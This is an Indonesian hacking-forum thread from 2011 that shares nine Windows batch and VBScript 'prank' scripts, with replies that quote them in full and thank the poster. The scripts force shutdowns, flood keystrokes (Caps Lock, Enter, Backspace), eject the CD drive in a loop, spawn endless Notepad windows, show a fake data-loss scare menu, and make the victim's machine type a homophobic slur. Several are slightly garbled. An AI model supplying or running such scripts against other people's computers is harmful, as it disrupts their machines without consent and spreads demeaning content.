|
| Kumpulan Script Jahil | |
|
+4artake Hanzou zer03s BumiayuKita 8 posters | Pengirim | Message |
---|
BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Kumpulan Script Jahil Thu Apr 14, 2011 3:59 am | |
| Kali ini kita buat beberapa script yang berfungsi pada OS windows, scriptnya akan berfungsi sesuai dengan fungsinya
Tidak perlu susah ? karna script hanya di muat di notepad, type save nya cukup dengan format .VBS atau .bat
Langsung aja deh ?
1). Memberi pesan dan shutdown komputer : Code:
@echo off msg * Aku tidak suka kamu shutdown -c ?Error! Kamu jelek sekali? -s
Note : save dengan .bat
2). Menyalakan tombol Caps lock secara simultan : Code:
Set wshShell =wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?{CAPSLOCK}? loop
Note : save dengan extension .vbs
3). Buka/tutup CD drive secara terus menerus : Code:
Set oWMP = CreateObject(?WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count ? 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count ? 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
Note : save dengan Extexsion .vbs
4). Tekan Enter secara simultan : Code:
et wshShell = wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?~(enter)? loop
Note : save dengan ex.vbs
5). Mengetik pesan kita secara otomatis di notepad : Code:
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(?WScript.Shell?) WshShell.Run ?notepad? WScript.Sleep 100 WshShell.AppActivate ?Notepad? WScript.Sleep 500 WshShell.SendKeys ?Hel? WScript.Sleep 500 WshShell.SendKeys ?lo ? WScript.Sleep 500 WshShell.SendKeys ?, ho? WScript.Sleep 500 WshShell.SendKeys ?w a? WScript.Sleep 500 WshShell.SendKeys ?re ? WScript.Sleep 500 WshShell.SendKeys ?you? WScript.Sleep 500 WshShell.SendKeys ?? ? WScript.Sleep 500 WshShell.SendKeys ?I a? WScript.Sleep 500 WshShell.SendKeys ?m g? WScript.Sleep 500 WshShell.SendKeys ?ood? WScript.Sleep 500 WshShell.SendKeys ? th? WScript.Sleep 500 WshShell.SendKeys ?ank? WScript.Sleep 500 WshShell.SendKeys ?s! ?
Note : save dengan Ex.vbs
6). Menjalankan BACKSPACE secara simultan : Code:
MsgBox ?Let?s go back a few steps? Set wshShell =wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?{bs}? loop
Note : save dengan ex.vbs
7). Buka Notepad secara terus menerus : Code:
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
Note : save dengan type .bat
8). Munculin 5 pilihan yang harus korban pilih : Code:
@echo off title The end of the world cd C:\ :menu cls echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri? pause echo pilih nama cwe yang lu suka =P : echo 1. datanya bakal ilang lho. echo 2. komputer nya corrupt lho echo 3. heheh no comment deh klo yang ini echo 4. mau mati pake jalan ini? echo 5. bye bye? set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two
Note : save dengan .bat
9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan : Code:
Set wshShell = wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?You are a gay? loop
Note : save dengan ex.vbs | |
| | | zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: Re: Kumpulan Script Jahil Thu Apr 14, 2011 2:59 pm | |
| Lumajang buat nambah koleksi | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Thu Apr 14, 2011 6:05 pm | |
| | |
| | | Hanzou Pro Nubie
Jumlah posting : 57 Points : 88 Reputation : 5 Join date : 20.05.11 Age : 34 Lokasi : GorHckEd
| Subyek: Re: Kumpulan Script Jahil Sun May 22, 2011 12:16 am | |
| | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Sat Jun 04, 2011 12:23 pm | |
| terimakasih gan,silakan di coba gan :mgaya: :mgaya: | |
| | | artake Moderator
Jumlah posting : 246 Points : 294 Reputation : 13 Join date : 02.05.11 Age : 34 Lokasi : C:/L3g.0n
| | | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 2:45 am | |
| tanggung sendiri gan | |
| | | kenta Mundane Person
Jumlah posting : 203 Points : 280 Reputation : 6 Join date : 03.03.11
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 7:36 am | |
| wah makasih gan | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 9:02 am | |
| sama sama gan,kan agan yang ngajari | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 1:17 pm | |
| - chc(tetsuya) wrote:
- Kali ini kita buat beberapa script yang berfungsi pada OS windows, scriptnya akan berfungsi sesuai dengan fungsinya
Tidak perlu susah ? karna script hanya di muat di notepad, type save nya cukup dengan format .VBS atau .bat
Langsung aja deh ?
1). Memberi pesan dan shutdown komputer : Code:
@echo off msg * Aku tidak suka kamu shutdown -c ?Error! Kamu jelek sekali? -s
Note : save dengan .bat
2). Menyalakan tombol Caps lock secara simultan : Code:
Set wshShell =wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?{CAPSLOCK}? loop
Note : save dengan extension .vbs
3). Buka/tutup CD drive secara terus menerus : Code:
Set oWMP = CreateObject(?WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count ? 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count ? 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
Note : save dengan Extexsion .vbs
4). Tekan Enter secara simultan : Code:
et wshShell = wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?~(enter)? loop
Note : save dengan ex.vbs
5). Mengetik pesan kita secara otomatis di notepad : Code:
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(?WScript.Shell?) WshShell.Run ?notepad? WScript.Sleep 100 WshShell.AppActivate ?Notepad? WScript.Sleep 500 WshShell.SendKeys ?Hel? WScript.Sleep 500 WshShell.SendKeys ?lo ? WScript.Sleep 500 WshShell.SendKeys ?, ho? WScript.Sleep 500 WshShell.SendKeys ?w a? WScript.Sleep 500 WshShell.SendKeys ?re ? WScript.Sleep 500 WshShell.SendKeys ?you? WScript.Sleep 500 WshShell.SendKeys ?? ? WScript.Sleep 500 WshShell.SendKeys ?I a? WScript.Sleep 500 WshShell.SendKeys ?m g? WScript.Sleep 500 WshShell.SendKeys ?ood? WScript.Sleep 500 WshShell.SendKeys ? th? WScript.Sleep 500 WshShell.SendKeys ?ank? WScript.Sleep 500 WshShell.SendKeys ?s! ?
Note : save dengan Ex.vbs
6). Menjalankan BACKSPACE secara simultan : Code:
MsgBox ?Let?s go back a few steps? Set wshShell =wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?{bs}? loop
Note : save dengan ex.vbs
7). Buka Notepad secara terus menerus : Code:
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
Note : save dengan type .bat
8). Munculin 5 pilihan yang harus korban pilih : Code:
@echo off title The end of the world cd C:\ :menu cls echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri? pause echo pilih nama cwe yang lu suka =P : echo 1. datanya bakal ilang lho. echo 2. komputer nya corrupt lho echo 3. heheh no comment deh klo yang ini echo 4. mau mati pake jalan ini? echo 5. bye bye? set input=nothing set /p input=Choice: if %input%==1 goto one if %input%==2 goto two
Note : save dengan .bat
9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan : Code:
Set wshShell = wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?You are a gay? loop
Note : save dengan ex.vbs ijin sedot gan!!! lumayan jahil di bulan puasa!!! | |
| | | kid_1412 Pro Nubie
Jumlah posting : 68 Points : 73 Reputation : 1 Join date : 07.07.11
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 6:17 pm | |
| | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: Kumpulan Script Jahil Wed Aug 03, 2011 9:52 pm | |
| Fungsi scriptnya bikin w ngakak..... wkwkkwkwkwkwkwkwwkkk | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| | | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: Kumpulan Script Jahil Fri Aug 05, 2011 7:52 am | |
| - chc(tetsuya) wrote:
- saderabdan wrote:
- Fungsi scriptnya bikin w ngakak.....
wkwkkwkwkwkwkwkwwkkk kenapa gan?? 9). Hack keyboard sehingga korban dipaksa mengetik ? You are a gay? secara simultan : Code: Set wshShell = wscript.CreateObject(?WScript.Shell?) do wscript.sleep 100 wshshell.sendkeys ?You are a gay? loop Note : save dengan ex.vbs sksksksk fungsinya... wkwkkwkwkwk | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Sat Aug 06, 2011 12:57 am | |
| perbaiki kklo ada yang salah gan | |
| | | Squerpants VIP Member
Jumlah posting : 427 Points : 595 Reputation : 28 Join date : 15.01.11 Age : 33 Lokasi : Hidden
| Subyek: Re: Kumpulan Script Jahil Sat Aug 06, 2011 9:41 am | |
| | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: Kumpulan Script Jahil Sat Aug 06, 2011 9:04 pm | |
| :fun1: silakan sikat kak :war: | |
| | | Sponsored content
| Subyek: Re: Kumpulan Script Jahil | |
| |
| | | | Kumpulan Script Jahil | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|